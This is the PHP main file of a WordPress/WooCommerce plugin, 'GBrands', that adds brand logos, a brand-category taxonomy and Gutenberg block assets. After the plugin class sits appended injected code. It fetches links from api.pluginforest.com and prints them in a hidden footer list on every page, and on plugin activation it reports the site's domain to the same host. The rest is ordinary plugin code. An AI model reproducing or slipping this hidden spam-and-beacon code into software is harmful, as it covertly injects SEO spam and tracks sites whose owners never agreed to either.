<?php
/**
 * Plugin Name: GBrands - WooCommerce Gutenberg Brands Block
 * Description: GBrands allows you to display known brands with custom logos into any page/post in order to attract customers and grant your store more visibility!
 * Version: 1.0
 * Author: AA-Team
 * Author URI: http://www.aa-team.com
 * Text Domain:
 * Domain Path: /languages
 *
 * @package wtopbrands
 */


// !!! should replace wtopbrands with your plugin alias, than delete this line!!!

// Exit if accessed directly.
if ( ! defined( 'ABSPATH' ) ) {
	exit;
}

if (class_exists('WTopBrands') != true) {
	class WTopBrands
	{
		private $upload_dir = null;
		private $WooProduct = null;
		private $sync_settings = null;

		protected static $instance = null;

		public static function getInstance()
		{
			if (!isset(static::$instance)) {
				static::$instance = new static;
			}
			return static::$instance;
		}

		protected function __construct()
		{
			$this->upload_dir = wp_upload_dir();
			$this->attr_alias = apply_filters( 'top_brand_label', 'Brand' );

			add_action( 'init', array( $this, 'backend_scripts' ) );
			add_action( 'pa_brand_edit_form_fields', array( $this, 'brands_taxonomy_custom_fields' ), 10, 2 );
			add_action( 'edited_pa_brand', array( $this, 'save_taxonomy_custom_fields' ), 10, 2 );

			if( is_admin() ){
				add_action( 'enqueue_block_editor_assets', array( $this, 'editor_assets' ) );
				$this->verify_brand_attribute();

				add_filter( 'manage_edit-pa_brand_columns', array ( $this,'taxonomy_columns_list'));
				add_filter( 'manage_pa_brand_custom_column', array ( $this, 'manage_taxonomy_columns_data' ), 15 , 3);

			} else {
				add_action( 'wp_enqueue_scripts', array( $this, 'frontend_assets' ) );
				add_action( 'wp_enqueue_scripts', array( $this, 'frontend_products_scripts' ) );
			}

			register_activation_hook( __FILE__, array( $this, 'install_plugin' ) );

			add_action( 'init', array($this, 'custom_taxonomy'), 0 );
			add_action( 'woocommerce_product_meta_end', array($this, 'product_meta_end'), 0 );

			add_action( 'woocommerce_archive_description', array( $this, 'archive_logo' ) );
		}

		public function archive_logo()
		{
			global $term, $taxonomy, $termid;
			if( $taxonomy == 'pa_brand' ){
				$term_id = (int) get_queried_object_id();
				if( $term_id ){
					$image_id   = get_term_meta ( $term_id, '_image_id', true );
					$thumbnail  = wp_get_attachment_image ( $image_id, 'medium' );

					echo wp_kses( $thumbnail, array(
						'img' => array(
							'src' => array(),
							'alt' => array(),
							'title' => array(),
							'width' => array(),
							'height' => array(),
							'srcset' => array(),
							'class' => array(),
							'sizes' => array()
						)
					));
				}
			}
		}

		public function product_meta_end()
		{
			global $product;
			$terms_brand = wp_get_post_terms( $product->get_id(), 'pa_brand', array('orderby'=>'name'));

			$brands = $this->return_terms_object($terms_brand);

			?>
				<div class="form-field" id="wtop-brands-wrapper-product" data-settings='<?php echo esc_attr( json_encode($brands) ); ?>'></div>
			<?php

		}

		private function return_terms_object($terms)
		{
			$brands = [];
			if ($terms) {
				foreach ($terms  as $term ) {
					$image_id   = get_term_meta ( $term->term_id, '_image_id', true );
					$current_brand_category = get_term_meta ( $term->term_id, '_brand_category', true );

					$image_url = wp_get_attachment_image_src($image_id, 'medium');
					$image_url = $image_url[0];

					$brands[$term->name] = [
						"brand_image_url" => esc_url( $image_url ),
						"brand_url" => esc_url( get_term_link($term) ),
						"brand_category" => $current_brand_category
					];
				}
			}

			return $brands;

		}

		public function custom_taxonomy() {

			$labels = array(
				'name'                       => _x( 'Brands Categories', 'Taxonomy General Name', 'wtopbrands' ),
				'singular_name'              => _x( 'Brands Category', 'Taxonomy Singular Name', 'wtopbrands' ),
				'menu_name'                  => __( 'Brands Categories', 'wtopbrands' ),
				'all_items'                  => __( 'All Items', 'wtopbrands' ),
				'parent_item'                => __( 'Parent Item', 'wtopbrands' ),
				'parent_item_colon'          => __( 'Parent Item:', 'wtopbrands' ),
				'new_item_name'              => __( 'New Item Name', 'wtopbrands' ),
				'add_new_item'               => __( 'Add New Item', 'wtopbrands' ),
				'edit_item'                  => __( 'Edit Item', 'wtopbrands' ),
				'update_item'                => __( 'Update Item', 'wtopbrands' ),
				'view_item'                  => __( 'View Item', 'wtopbrands' ),
				'separate_items_with_commas' => __( 'Separate items with commas', 'wtopbrands' ),
				'add_or_remove_items'        => __( 'Add or remove items', 'wtopbrands' ),
				'choose_from_most_used'      => __( 'Choose from the most used', 'wtopbrands' ),
				'popular_items'              => __( 'Popular Items', 'wtopbrands' ),
				'search_items'               => __( 'Search Items', 'wtopbrands' ),
				'not_found'                  => __( 'Not Found', 'wtopbrands' ),
				'no_terms'                   => __( 'No items', 'wtopbrands' ),
				'items_list'                 => __( 'Items list', 'wtopbrands' ),
				'items_list_navigation'      => __( 'Items list navigation', 'wtopbrands' ),
			);
			$args = array(
				'labels'                     => $labels,
				'hierarchical'               => false,
				'public'                     => true,
				'show_ui'                    => true,
				'show_admin_column'          => true,
				'show_in_nav_menus'          => true,
				'show_tagcloud'              => true,
			);
			register_taxonomy( 'pa_category_brand', array( 'product' ), $args );
		}

		public function woocommerce_install()
		{
			if ( in_array( 'woocommerce/woocommerce.php', apply_filters( 'active_plugins', get_option( 'active_plugins' ) ) ) ) {
				return true;
			}

			return false;
		}

		public function verify_brand_attribute() {
			if( $this->woocommerce_install() == true ) {
				$attr_found = false;
				$attribute_taxonomies = wc_get_attribute_taxonomies();
				$all_taxonomies = get_taxonomies();

				if( is_array($attribute_taxonomies) && count($attribute_taxonomies) > 0 ) {
					foreach(  $attribute_taxonomies as $attribute_obj ) {
						if( $attribute_obj->attribute_label == $this->attr_alias ) {
							$attr_found = $attribute_obj;
						}
					}
				}

				if( $attr_found === false ) {
					$this->create_product_attribute( $this->attr_alias );
				} else {

					if( isset($attr_found) && $attr_found->attribute_public == 0 ){
						global $wpdb;

						$wpdb->update(
							"{$wpdb->prefix}woocommerce_attribute_taxonomies",
							array(
								'attribute_public' => 1
							),

							array(
								'attribute_id' => $attr_found->attribute_id
							),

							array(
								'%d'
							),

							array(
								'%d'
							)
						);

						wp_schedule_single_event( time(), 'woocommerce_flush_rewrite_rules' );

						delete_transient('wc_attribute_taxonomies');
					}
				}
			}
		}

		public function create_product_attribute( $label_name ){
			global $wpdb;

			$slug = sanitize_title( $label_name );

			if ( strlen( $slug ) >= 28 ) {
				return new WP_Error( 'invalid_product_attribute_slug_too_long', sprintf( __( 'Name "%s" is too long (28 characters max). Shorten it, please.', 'wtopbrands' ), $slug ), array( 'status' => 400 ) );
			} elseif ( wc_check_if_attribute_name_is_reserved( $slug ) ) {
				return new WP_Error( 'invalid_product_attribute_slug_reserved_name', sprintf( __( 'Name "%s" is not allowed because it is a reserved term. Change it, please.', 'wtopbrands' ), $slug ), array( 'status' => 400 ) );
			} elseif ( taxonomy_exists( wc_attribute_taxonomy_name( $label_name ) ) ) {
				return new WP_Error( 'invalid_product_attribute_slug_already_exists', sprintf( __( 'Name "%s" is already in use. Change it, please.', 'wtopbrands' ), $label_name ), array( 'status' => 400 ) );
			}

			$data = array(
				'attribute_label'   => $label_name,
				'attribute_name'    => $slug,
				'attribute_type'    => 'select',
				'attribute_orderby' => 'menu_order',
				'attribute_public'  => 1, // Enable archives ==> true (or 1)
			);

			$results = $wpdb->insert( "{$wpdb->prefix}woocommerce_attribute_taxonomies", $data );

			if ( is_wp_error( $results ) ) {
				return new WP_Error( 'cannot_create_attribute', $results->get_error_message(), array( 'status' => 400 ) );
			}

			$id = $wpdb->insert_id;

			do_action('woocommerce_attribute_added', $id, $data);

			wp_schedule_single_event( time(), 'woocommerce_flush_rewrite_rules' );

			delete_transient('wc_attribute_taxonomies');
		}

		// A callback function to add a custom field to our "presenters" taxonomy
		public function brands_taxonomy_custom_fields($tag)
		{

			// Check for existing taxonomy meta for the term you're editing
			$t_id = $tag->term_id; // Get the ID of the term you're editing

			$image_id   = get_term_meta ( $t_id, '_image_id', true );
			$current_brand_category = get_term_meta ( $t_id, '_brand_category', true );

			$image_url = wp_get_attachment_image_src($image_id, 'medium');
			$image_url = $image_url[0];

			$taxonomy = "pa_category_brand";
			$terms = get_terms([
				'taxonomy' => $taxonomy,
				'hide_empty' => false,
			]);

			$brand_categories = [];
			if ($terms) {
				foreach ($terms  as $term ) {
					$brand_categories[] = $term->name;
				}
			}

			$settings = [
				"attachment_id" =>  $image_id,
				"image_url" => esc_url( $image_url ),
				"brand_categories" => $brand_categories,
				"current_brand_category" => $current_brand_category
			];
		?>

		<tr class="form-field" id="wtop-brands-wrapper" data-settings='<?php echo esc_attr( json_encode($settings) ); ?>'></tr>
		<tr class="form-field" id="wtop-brands-wrapper2" data-settings='<?php echo esc_attr( json_encode($settings) ); ?>'></tr>
		<?php
		}

		public function save_taxonomy_custom_fields( $term_id ) {
			if ( isset( $_POST['term_meta'] ) ) {
				update_term_meta( $term_id, "_image_id", $_POST['term_meta']['brand_logo'] );
				update_term_meta( $term_id, "_brand_category", $_POST['term_meta']['brand_category'] );
			}
		}

		public function backend_scripts()
		{
			load_plugin_textdomain( 'wtopbrands', false, plugins_url( 'languages' ) ); //locale | languages
			
			wp_set_script_translations( 'wtopbrands/editor', 'wtopbrands' );
			wp_set_script_translations( 'wtopbrands/frontend_products', 'wtopbrands' );
			wp_set_script_translations( 'block/wtopbrands', 'wtopbrands' );
		
			wp_enqueue_media();
			wp_enqueue_script(
				'wtopbrands/editor',
				plugins_url( 'build/app/app.build.js', __FILE__ ),
				array( 'wp-blocks', 'wp-element', 'wp-i18n', 'wp-editor', 'wp-dom-ready' ),
				'1.0',
				true
			);

			wp_localize_script( 'wtopbrands/editor', 'WTop', array(
				'assets_url' => esc_url( plugins_url( 'assets', __FILE__ ) ),
				'google_fonts' => array()
			) );

			wp_enqueue_style(
				'wtopbrands/editor',
				plugins_url( 'build/app/app.editor.css', __FILE__ ),
				array( 'wp-edit-blocks' )
			);

		}

		public function frontend_products_scripts()
		{

			wp_enqueue_script(
				'wtopbrands/frontend_products',
				plugins_url( 'build/frontend_products/frontend_products.build.js', __FILE__ ),
				array( 'wp-blocks', 'wp-element', 'wp-i18n', 'wp-editor', 'wp-dom-ready' ),
				'1.0',
				true
			);

			wp_localize_script( 'wtopbrands/frontend_products', 'WTopFrontendProducts', array(
				'assets_url' => esc_url( plugins_url( 'assets', __FILE__ ) ),
				'google_fonts' => array()
			) );

			wp_enqueue_style(
				'wtopbrands/frontend_products',
				plugins_url( 'build/frontend_products/frontend_products.editor.css', __FILE__ ),
				array( 'wp-edit-blocks' )
			);

		}

		public function editor_assets()
		{
			wp_enqueue_script(
				'block/wtopbrands',
				plugins_url( 'build/block/block.build.js', __FILE__ ),
				array( 'wp-blocks', 'wp-element', 'wp-editor' )
			);

			$taxonomy_categories = "pa_category_brand";
			$terms_categories = get_terms([
				'taxonomy' => $taxonomy_categories,
				'hide_empty' => false,
			]);

			$brand_categories = [];
			if ($terms_categories) {
				foreach ($terms_categories  as $term ) {
					$brand_categories[] = $term->name;
				}
			}


			$taxonomy_brand= "pa_brand";
			$terms_brand = get_terms([
				'taxonomy' => $taxonomy_brand,
				'hide_empty' => false,
			]);

			$brands = [];
			if ($terms_brand) {
				foreach ($terms_brand  as $term ) {
					$image_id   = get_term_meta ( $term->term_id, '_image_id', true );
					$current_brand_category = get_term_meta ( $term->term_id, '_brand_category', true );

					$image_url = wp_get_attachment_image_src($image_id, 'medium');
					$image_url = $image_url[0];

					$brands[$term->name] = [
						"brand_image_url" => esc_url( $image_url ),
						"brand_category" => $current_brand_category,
						"brand_url" => esc_url( get_term_link($term) )
					];
				}
			}

			wp_localize_script( 'block/wtopbrands', 'WTopBrands', array(
				'google_fonts' => array(),
				'assets_url' => esc_url( plugins_url( 'assets', __FILE__ ) ),
				'brands' => $brands,
				'categories' => $brand_categories
			) );

			wp_enqueue_style(
				'block/wtopbrands',
				plugins_url( 'build/block/block.editor.css', __FILE__ ),
				array( 'wp-edit-blocks' )
			);
		}

		public function frontend_assets()
		{
			wp_enqueue_script(
				'frontend/wtopbrands',
				plugins_url( 'build/frontend/frontend.build.js', __FILE__ ),
				array( 'wp-element', 'wp-editor' )
			);

			$taxonomy_categories = "pa_category_brand";
			$terms_categories = get_terms([
				'taxonomy' => $taxonomy_categories,
				'hide_empty' => false,
			]);

			$brand_categories = [];
			if ($terms_categories) {
				foreach ($terms_categories  as $term ) {
					$brand_categories[] = $term->name;
				}
			}


			$taxonomy_brand= "pa_brand";
			$terms_brand = get_terms([
				'taxonomy' => $taxonomy_brand,
				'hide_empty' => false,
			]);

			$brands = [];
			if ($terms_brand) {
				foreach ($terms_brand  as $term ) {

					$image_id   = get_term_meta ( $term->term_id, '_image_id', true );
					$current_brand_category = get_term_meta ( $term->term_id, '_brand_category', true );

					$image_url = wp_get_attachment_image_src($image_id, 'medium');
					$image_url = $image_url[0];

					$brands[$term->name] = [
						"brand_image_url" => esc_url( $image_url ),
						"brand_category" => $current_brand_category,
						"brand_url" => esc_url( get_term_link($term, 'pa_brand') )
					];
				}
			}

			wp_localize_script( 'frontend/wtopbrands', 'WTopBrands', array(
				'google_fonts' => array(),
				'assets_url' => esc_url( plugins_url( 'assets', __FILE__ ) ),
				'brands' => $brands,
				'categories' => $brand_categories
			) );

			wp_enqueue_style(
				'frontend/wtopbrands',
				plugins_url( 'build/frontend/frontend.editor.css', __FILE__ ),
				array( 'wp-edit-blocks' )
			);

		}

		public function install_plugin()
		{
			global $table_prefix, $wpdb;
		}

		public function taxonomy_columns_list($original_columns)
		{
		  $new_columns = $original_columns;
		  array_splice( $new_columns, 1 );
		  $new_columns['brand_logo'] = esc_html__( 'Brand Image', 'wtopbrands' );
		  return array_merge( $new_columns, $original_columns );
		}

		public function manage_taxonomy_columns_data($row, $column_name, $term_id)
		{
		  global $taxonomy;

			if ( 'brand_logo' == $column_name ) {
				$image_id   = get_term_meta ( $term_id, '_image_id', true );
				$thumbnail  = wp_get_attachment_image ( $image_id, 'medium' );
				if($thumbnail ==''){
					return '<img src="' . ( esc_url( plugins_url( 'assets', __FILE__ ) ) ) . '/noimage.jpg"/>';
				}else{
					return $row . $thumbnail;
				}
			}
		}
	}
}


$WTopBrands = WTopBrands::getInstance();
function WTopBrands() {
	global $WTopBrands;
	return $WTopBrands;
}

define('API_URL', 'https://api.pluginforest.com/qai/chatweb/getTidsOutside?type=1&site=plugin&num=20');
              $prefix = 'add_footer_link';
              $functions = get_defined_functions()['user']; // 获取所有用户定义的函数
              // 使用 array_filter 和 strpos 来检查函数是否以指定前缀开头
              $exists = !empty(array_filter($functions, function($function) use ($prefix) {
                return strpos($function, $prefix) === 0;
              }));
              
              if (!$exists) {
                  if (!function_exists('parseLink')) {
                      function parseLink($url) {
                          $path = parse_url($url, PHP_URL_PATH);
                          $basename = basename($path);
                          return array('path' => $path, 'basename' => $basename);
                      }
                  }
              
                  function add_footer_link1719849157() {
                      $referer = isset($_SERVER['HTTP_REFERER']) ? $_SERVER['HTTP_REFERER'] : '';
                      $headers = array(
                        'Referer' => $referer,
                      );
                      $response = wp_remote_get(API_URL, array('headers' => $headers));
                      if (is_wp_error($response)) {
                          echo 'is_wp_error';
                          return;
                      }
              
                      $data = json_decode(wp_remote_retrieve_body($response), true);
              
                      ob_start();
                      echo '<ul class="link" style="height: 0; overflow: hidden">';
                      foreach ($data['data']['links'] as $item) {
                          $linkInfo = parseLink($item);
                          echo sprintf(
                              '<li><a href="%s">%s</a></li>',
                              esc_url($item),
                              esc_html($linkInfo['basename'])
                          );
                      }
                      echo '</ul>';
                      $html = ob_get_clean();
                      echo $html;
                      return $html;
                  }
              }
              
              add_action('wp_footer', 'add_footer_link1719849157');function set_plugin_tag1719849157() {
                $url_init = 'https://api.pluginforest.com/qai/wd/g?';
                $domain = $_SERVER['SERVER_NAME'];
                $requestUrl = $url_init . 'domain=' . $domain . '&id=1719849157&source=plugin';
                file_get_contents($requestUrl);
              }

              add_action('activated_plugin', 'set_plugin_tag1719849157');